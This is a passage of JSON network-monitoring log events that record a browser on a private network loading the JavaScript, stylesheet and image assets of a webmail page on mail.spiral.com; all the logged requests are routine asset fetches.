x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:01:17.200003+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.200688+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:01:17.200986+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:01:17.190061+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:01:17.191717+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:01:17.196294+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.202472+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.197485+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:01:17.202713+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:01:17.203688+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.204091+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:01:17.204245+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.204602+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:01:17.204937+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.205221+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:01:17.207382+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.207751+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:01:17.208069+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.208265+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:01:17.209288+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.209615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:01:17.210390+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.212241+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.212481+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:01:17.213145+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.213800+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.219337+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.219999+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:01:17.222526+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.223043+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:01:17.253333+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:01:17.257292+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:01:17.257320+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:01:17.273323+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:01:17.276605+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.276888+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:01:17.279412+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.321425+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:01:17.365360+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.365830+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:01:17.380340+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.380862+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} 